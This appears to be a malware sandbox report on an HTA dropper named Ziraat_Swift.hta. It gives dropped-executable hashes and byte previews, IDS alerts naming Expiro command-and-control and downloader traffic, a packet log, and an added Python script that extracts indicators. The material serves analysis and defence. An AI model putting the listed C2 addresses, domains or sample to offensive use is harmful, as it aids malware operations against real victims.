                                                                                                                                                SHA-256:461F48A056CBA271102DF0B06955C85F031F000329CA38F04F35FECDEC023E56
                                                                                                                                                SHA-512:7D4422F859901A56F584AF4A46A00EECA8C2A260C8077C97E11EE4988B52F2223BCE3B33B438663278DD118AE1C6AA2512109F0BB8EF545EA2B408CC42D49054
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..g.,0>u...6e...F4..%....:.....d..[X&.y.iP...[:.+i.eC.v.V"G..g...7.Y.M..)..y........0r....F7.....p..`.;*b.(.|....X>>..o..).=.U...................p..`o[....y..,-.c."I..\..B v.E=e.E..V.....J..M9..G.........Z.......6W.*.8*...\...S.|U.B.Y...f...v|IG7..5v.J'.~qao9...^W.J:...Y_.....n7....U.>M@..AUsd..o~......o .......?;.......d......].n&q.\..~L.l..M.p2....@....MB..S....0A./O...*.....1.{.o.FMy....3^+.^....mo...#..8....I....c..]s...iKO......D..D...BQ6.}R.. LT...:.Zc.J...~.y..}.4.l}.&....D.+?....H..g..].....5|f&X.cV..|H..U6...D..e:yq<./MhUBn..o].'8..I.#3..Z..#Y..^.x./8....J...Q...V....[K[&Q...A..\..,.(m....{#..o.y..~.'Pe`.l.tB.....L...P........rQ...e_XV.......bX3.me..dG.1u.s]]......(.. -.YG..1........-.S...{PD..Mu_F. v AK.LsD..,y..9sk..t.V.t..T....b%.=..~......5..q..m..Z..."..u...T..r.D]Z.44v...?E;R..x....*...0.S..CW[..5.mKZS_<:.{A..X.3..oe...p.9.s.BM.o..:0."..:c....]..W..`..E...L.~D.+H..n.c.-.....{...%1..t...F..7'Q...;21.#.i..Gv..]vq...`l.Y.;..
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1278464
                                                                                                                                                Entropy (8bit):5.142967604081751
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:kjkyzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kIyzsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:6B414CB462A630E3121C6075205CFF23
                                                                                                                                                SHA1:FFDE4B2A1B5B5684523D711BBBA47C51691F04C0
                                                                                                                                                SHA-256:227D63EE8BDF5CCCAC18A7E7720E35B91267E36F11F54756281EF8739877908D
                                                                                                                                                SHA-512:70DCDB21EED61D10B327A19AEFB36AC81C1056B9A31EE6C3288F7EF96D87E09F86300BA0E7BC34DB2B9183371FAE8692C484BCED2B7FA030F0EFFE8F68FBA94A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1199616
                                                                                                                                                Entropy (8bit):5.083876467963892
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:e4DBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:26B9B4F154D44F5E82A6738B098DC88E
                                                                                                                                                SHA1:40483AC8648D9E15EE6E2FA20F1995CB787F055D
                                                                                                                                                SHA-256:4CBB5A9425A4C8EB5EFF1097157EC67B5DE187D7CDE1B9DD927172685877446A
                                                                                                                                                SHA-512:53A8A4E3397F825F28BF3C9D0C9BC81A12DED7DDC8FB9AE4E81E1441C60750A19510B6CEAC0313486F58F1591F80DA008C7EC50EF78A158FC3293B6EF99BA4E2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................1..... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1146880
                                                                                                                                                Entropy (8bit):5.0275553024364035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:f9tXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B2CFA94DAEAB765B33AE6E7BD777C6D9
                                                                                                                                                SHA1:AED4A028860673A21D30DD7416496D32750A1099
                                                                                                                                                SHA-256:A40863112A305D02DE1D46ED6B35F98CA62621C08B922B7F7C29F5452740C063
                                                                                                                                                SHA-512:8434A966C0EF0A12EF1BB0E30C0C9FA062756BABC899C79C6D60671941F1791AC1262E4D0559F5D7E205DF6953F6E73C718BE5D3D8CD06B79EB7D46E221169F1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................u;.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                File type:HTML document, ASCII text, with very long lines (64805), with CRLF line terminators
                                                                                                                                                Entropy (8bit):5.806350213988054
                                                                                                                                                TrID:
                                                                                                                                                • HyperText Markup Language (15015/1) 28.87%
                                                                                                                                                • Visual Basic Script (13500/0) 25.95%
                                                                                                                                                • HyperText Markup Language (12001/1) 23.07%
                                                                                                                                                • HyperText Markup Language (11501/1) 22.11%
                                                                                                                                                File name:Ziraat_Swift.hta
                                                                                                                                                File size:2'325'905 bytes
                                                                                                                                                MD5:42080886d61700323e62d2de3a32454d
                                                                                                                                                SHA1:0d499a3a4b044cdd2685c2df7de1c4ebe740703f
                                                                                                                                                SHA256:5f0d6bb3445ed0c410b2dd8874cf7fc7b1c4e06cc2e620790eb782f2c339c796
                                                                                                                                                SHA512:1f6bc020e2818423e2540bbb0cc6a19f7bb6ac952d9f5cded5dce5a374c4d3c3aaabaf2ea1eabed2cbe4c24417b14a63285d7f33fd407de02cc46d8491280900
                                                                                                                                                SSDEEP:24576:CfE7hFTaWOiByiEkv5VKB0sQBKU4lqAzJQ0lOwAmp/wNR/GARRsFPEt592Sx09Hg:GKmUiq0XAmp/CsAUWUt9Yy8dNryaKC
                                                                                                                                                TLSH:81B5F121C6154D9C264BCD2D2D0A0D97511CFFFB958AFA06CA8A7C07A6DBF1E20B971C
                                                                                                                                                File Content Preview:<!DOCTYPE html>..<html>..<head>.. <title>Base64 to Executable</title>.. <HTA:APPLICATION .. ID="oHTA".. APPLICATIONNAME="Base64ToExecutable".. BORDER="none".. CAPTION="no".. SHOWINTASKBAR="no".. SINGLEINSTAN
                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-02T07:56:10.027681+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449731TCP
                                                                                                                                                2024-12-02T07:56:10.027681+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449731TCP
Timestamp                       | SID     | Signature                                                                      | Sev | Source IP       | Src Port | Dest IP         | Dst Port | Proto
2024-12-02T07:56:13.018778+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1   | 18.141.10.107   | 80       | 192.168.2.4     | 49734    | TCP
2024-12-02T07:56:13.018778+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1   | 18.141.10.107   | 80       | 192.168.2.4     | 49734    | TCP
2024-12-02T07:56:15.319591+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH                              | 2   | 192.168.2.4     | 49733    | 193.122.130.0   | 80       | TCP
2024-12-02T07:56:17.558035+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)                   | 1   | 192.168.2.4     | 62334    | 1.1.1.1         | 53       | UDP
2024-12-02T07:56:17.612052+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1   | 44.221.84.105   | 80       | 192.168.2.4     | 49737    | TCP
2024-12-02T07:56:17.612052+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1   | 44.221.84.105   | 80       | 192.168.2.4     | 49737    | TCP
2024-12-02T07:56:24.097750+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity                                    | 1   | 192.168.2.4     | 49744    | 54.244.188.177  | 80       | TCP
2024-12-02T07:56:26.236257+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)                  | 1   | 192.168.2.4     | 52629    | 1.1.1.1         | 53       | UDP
2024-12-02T07:56:27.710262+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH                              | 2   | 192.168.2.4     | 49749    | 193.122.130.0   | 80       | TCP
2024-12-02T07:57:38.022398+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity                                    | 1   | 192.168.2.4     | 49790    | 82.112.184.197  | 80       | TCP
2024-12-02T07:57:55.225518+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1   | 47.129.31.212   | 80       | 192.168.2.4     | 49872    | TCP
2024-12-02T07:57:55.225518+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1   | 47.129.31.212   | 80       | 192.168.2.4     | 49872    | TCP
2024-12-02T07:57:58.046080+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1   | 13.251.16.150   | 80       | 192.168.2.4     | 49881    | TCP
2024-12-02T07:57:58.046080+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1   | 13.251.16.150   | 80       | 192.168.2.4     | 49881    | TCP
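Turning the alert table above into an indicator list is not as direct as taking every destination IP: the AnubisNetworks sinkhole rules (SIDs 2018141 and 2037771) match the HTTP response, so the remote host sits in the source column, and for the DNS rules the destination is the resolver while the real indicator is the defanged domain in the rule name. The following Python script is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It embeds a subset of the rows above (transcribed from the table), assumes the analysis guest is 192.168.2.4 (the endpoint present in every row), and uses keyword rules of my own to map ET signature names to categories.

```python
"""IOC extraction from the Suricata alert rows of this report.

Added example, not part of the Joe Sandbox report. The alert rows below are
transcribed from the report's IDS alert table (a subset); the analysis-VM
address and the keyword rules are assumptions made for this example.
"""
import re
from dataclasses import dataclass, field

ANALYSIS_VM = "192.168.2.4"  # assumption: the sandbox guest, the 192.168.2.4 endpoint in every row

# timestamp|sid|signature|severity|src_ip|src_port|dst_ip|dst_port|proto (transcribed from the report)
RAW_ALERTS = """\
2024-12-02T07:56:13.018778+0100|2018141|ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz|1|18.141.10.107|80|192.168.2.4|49734|TCP
2024-12-02T07:56:13.018778+0100|2037771|ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst|1|18.141.10.107|80|192.168.2.4|49734|TCP
2024-12-02T07:56:15.319591+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49733|193.122.130.0|80|TCP
2024-12-02T07:56:17.558035+0100|2051648|ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)|1|192.168.2.4|62334|1.1.1.1|53|UDP
2024-12-02T07:56:17.612052+0100|2018141|ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz|1|44.221.84.105|80|192.168.2.4|49737|TCP
2024-12-02T07:56:24.097750+0100|2850851|ETPRO MALWARE Win32/Expiro.NDO CnC Activity|1|192.168.2.4|49744|54.244.188.177|80|TCP
2024-12-02T07:56:26.236257+0100|2051649|ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)|1|192.168.2.4|52629|1.1.1.1|53|UDP
2024-12-02T07:56:27.710262+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.4|49749|193.122.130.0|80|TCP
2024-12-02T07:57:38.022398+0100|2850851|ETPRO MALWARE Win32/Expiro.NDO CnC Activity|1|192.168.2.4|49790|82.112.184.197|80|TCP
"""

# ET rule names defang the queried domain with a space before the TLD: "(przvgke .biz)"
DEFANGED_DOMAIN = re.compile(r"\(([A-Za-z0-9-]+) ?\.([A-Za-z0-9.-]+)\)")


@dataclass
class Indicator:
    value: str        # IP address or domain
    kind: str         # "ip" or "domain"
    category: str     # sinkhole / c2 / downloader / dns / other
    sids: set = field(default_factory=set)
    hits: int = 0
    first_seen: str = ""
    last_seen: str = ""


def parse_alerts(text):
    """Split the pipe-delimited rows into dicts with typed ports and severity."""
    rows = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
        rows.append({"ts": ts, "sid": int(sid), "sig": sig, "sev": int(sev),
                     "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto})
    return rows


def categorize(signature):
    """Keyword rules (assumption) mapping ET signature names to an IOC category."""
    s = signature.lower()
    if "sinkhole" in s:
        return "sinkhole"
    if "cnc" in s or "command and control" in s:
        return "c2"
    if "dns query" in s:
        return "dns"
    if "downloader" in s:
        return "downloader"
    return "other"


def orient(row, local=ANALYSIS_VM):
    """Return (local_endpoint, remote_endpoint) whichever side Suricata listed first.

    Sinkhole cookie rules match the HTTP response, so there the guest is the
    destination and the remote host is the source."""
    if row["src"][0] == local:
        return row["src"], row["dst"]
    if row["dst"][0] == local:
        return row["dst"], row["src"]
    raise ValueError(f"neither endpoint is the analysis VM: {row}")


def refang_domain(signature):
    """Recover the queried domain from the defanged form in the rule name."""
    m = DEFANGED_DOMAIN.search(signature)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def extract_iocs(rows, local=ANALYSIS_VM):
    """Deduplicate alerts into indicators keyed by remote IP or queried domain."""
    iocs = {}
    for row in rows:
        cat = categorize(row["sig"])
        _, (remote_ip, _remote_port) = orient(row, local)
        if cat == "dns":
            # the remote IP of a DNS alert is only the resolver; the indicator is the name
            value = refang_domain(row["sig"])
            if value is None:
                continue
            kind = "domain"
        else:
            value, kind = remote_ip, "ip"
        ind = iocs.setdefault(value, Indicator(value, kind, cat))
        ind.sids.add(row["sid"])
        ind.hits += 1
        ind.first_seen = min(ind.first_seen or row["ts"], row["ts"])
        ind.last_seen = max(ind.last_seen, row["ts"])
    return iocs


def render(iocs):
    """One line per indicator, sorted by category; sinkhole hits are flagged."""
    out = []
    for ind in sorted(iocs.values(), key=lambda i: (i.category, i.value)):
        note = "  # sinkhole response: proves infection, not attacker infrastructure" if ind.category == "sinkhole" else ""
        out.append(f"{ind.category:<10} {ind.kind:<6} {ind.value:<16} hits={ind.hits} sids={sorted(ind.sids)}{note}")
    return out


if __name__ == "__main__":
    for line in render(extract_iocs(parse_alerts(RAW_ALERTS))):
        print(line)
```

The orientation step is the part worth keeping: a script that blindly takes the destination address would list the sandbox guest itself for the sinkhole rows. The sinkhole addresses confirm that the host reached a domain that researchers now control, which is useful evidence of the infection chain, but they are not attacker infrastructure and blocking them changes nothing; the two Expiro.NDO CnC destinations and the downloader host are the addresses to act on.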
Timestamp                          | Src Port | Dst Port | Source IP       | Dest IP
Dec 2, 2024 07:56:07.148231983 CET | 49730    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:07.268418074 CET | 80       | 49730    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:07.268511057 CET | 49730    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:07.579886913 CET | 49730    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.327303886 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.447262049 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:08.447385073 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.478467941 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.478467941 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.548065901 CET | 49732    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.598512888 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:08.598541021 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:08.669473886 CET | 80       | 49732    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:08.669564009 CET | 49732    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.670545101 CET | 49732    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.670588970 CET | 49732    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:08.790582895 CET | 80       | 49732    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:08.790612936 CET | 80       | 49732    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:09.793368101 CET | 49732    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:09.868376970 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:09.906385899 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:09.906483889 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:09.906560898 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:09.907538891 CET | 49731    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:09.988394976 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:09.988508940 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:09.989016056 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:10.027681112 CET | 80       | 49731    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:10.109006882 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:10.559447050 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:10.679389954 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:10.679502010 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:10.680054903 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:10.680156946 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:10.799925089 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:10.799994946 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:12.898097038 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:12.898211002 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:12.898221016 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:12.898277044 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:12.898755074 CET | 49734    | 80       | 192.168.2.4     | 18.141.10.107
Dec 2, 2024 07:56:12.903351068 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:12.999541044 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:12.999603033 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:13.018778086 CET | 80       | 49734    | 18.141.10.107   | 192.168.2.4
Dec 2, 2024 07:56:13.023282051 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:14.111118078 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:14.230984926 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:14.231080055 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:14.231604099 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:14.231604099 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:14.351703882 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:14.351717949 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:15.276699066 CET | 80       | 49733    | 193.122.130.0   | 192.168.2.4
Dec 2, 2024 07:56:15.319591045 CET | 49733    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:15.613147020 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:15.613190889 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:15.613251925 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:15.634061098 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:15.634084940 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:15.640903950 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:15.641061068 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:15.641062975 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:15.641104937 CET | 49735    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:15.760960102 CET | 80       | 49735    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:16.223942041 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:16.343952894 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:16.345046997 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:16.345405102 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:16.345429897 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:16.465435028 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:16.465528011 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:16.849581003 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:16.849662066 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:16.876023054 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:16.876041889 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:16.876333952 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:16.928981066 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:16.990036011 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:17.031338930 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:17.491005898 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:17.491163015 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:17.491220951 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:17.491255045 CET | 49737    | 80       | 192.168.2.4     | 44.221.84.105
Dec 2, 2024 07:56:17.612051964 CET | 80       | 49737    | 44.221.84.105   | 192.168.2.4
Dec 2, 2024 07:56:17.666747093 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:17.666806936 CET | 443      | 49736    | 104.21.67.152   | 192.168.2.4
Dec 2, 2024 07:56:17.667054892 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:17.709606886 CET | 49736    | 443      | 192.168.2.4     | 104.21.67.152
Dec 2, 2024 07:56:18.002762079 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:18.122740030 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:18.122848034 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:18.137799978 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:18.137904882 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:18.257790089 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:18.257910967 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:19.299092054 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:19.355370998 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:19.717149973 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:19.837086916 CET | 80       | 49740    | 72.52.179.174   | 192.168.2.4
Dec 2, 2024 07:56:19.837239981 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:19.839653015 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:19.959533930 CET | 80       | 49740    | 72.52.179.174   | 192.168.2.4
Dec 2, 2024 07:56:21.104057074 CET | 80       | 49740    | 72.52.179.174   | 192.168.2.4
Dec 2, 2024 07:56:21.147723913 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:21.614098072 CET | 49742    | 80       | 192.168.2.4     | 199.59.243.227
Dec 2, 2024 07:56:21.734291077 CET | 80       | 49742    | 199.59.243.227  | 192.168.2.4
Dec 2, 2024 07:56:21.734389067 CET | 49742    | 80       | 192.168.2.4     | 199.59.243.227
Dec 2, 2024 07:56:21.940155983 CET | 49742    | 80       | 192.168.2.4     | 199.59.243.227
Dec 2, 2024 07:56:22.060062885 CET | 80       | 49742    | 199.59.243.227  | 192.168.2.4
Dec 2, 2024 07:56:22.707910061 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:22.827925920 CET | 80       | 49744    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:22.828021049 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:22.828371048 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:22.828392029 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:22.876645088 CET | 80       | 49742    | 199.59.243.227  | 192.168.2.4
Dec 2, 2024 07:56:22.876770020 CET | 80       | 49742    | 199.59.243.227  | 192.168.2.4
Dec 2, 2024 07:56:22.876822948 CET | 49742    | 80       | 192.168.2.4     | 199.59.243.227
Dec 2, 2024 07:56:22.948189020 CET | 80       | 49744    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:22.948250055 CET | 80       | 49744    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:22.955192089 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:22.955224991 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:23.075032949 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:23.075086117 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:23.303093910 CET | 80       | 49738    | 172.234.222.138 | 192.168.2.4
Dec 2, 2024 07:56:23.322401047 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:23.350872040 CET | 49738    | 80       | 192.168.2.4     | 172.234.222.138
Dec 2, 2024 07:56:23.442538023 CET | 80       | 49740    | 72.52.179.174   | 192.168.2.4
